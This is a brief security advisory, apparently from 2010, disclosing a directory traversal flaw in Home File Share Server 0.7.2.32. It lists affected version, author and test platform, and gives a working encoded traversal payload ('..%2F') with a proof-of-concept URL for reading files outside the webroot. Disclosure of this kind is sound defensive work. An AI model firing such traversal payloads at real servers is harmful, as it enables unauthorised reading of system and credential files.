Home File Share Server version 0.7.2.32 suffers from a directory traversal vulnerability.
27be96680c7e13d030a5fae4d6be617be074de118c54ab2cc5fc7ab7df18ec9e
------------------------------------------------------------------------
Software................Home File Share Server 0.7.2.32
Vulnerability...........Directory Traversal
Download................https://downstairs.dnsalias.net/homefileshareserver.html
Release Date............10/31/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................https://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in Home File Share Server 0.7.2.32
can be exploited to read files outside of the webroot directory.
--Exploit--
..%2F
The user must be authenticated and the path must begin with a real folder.
--PoC--
https://localhost/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F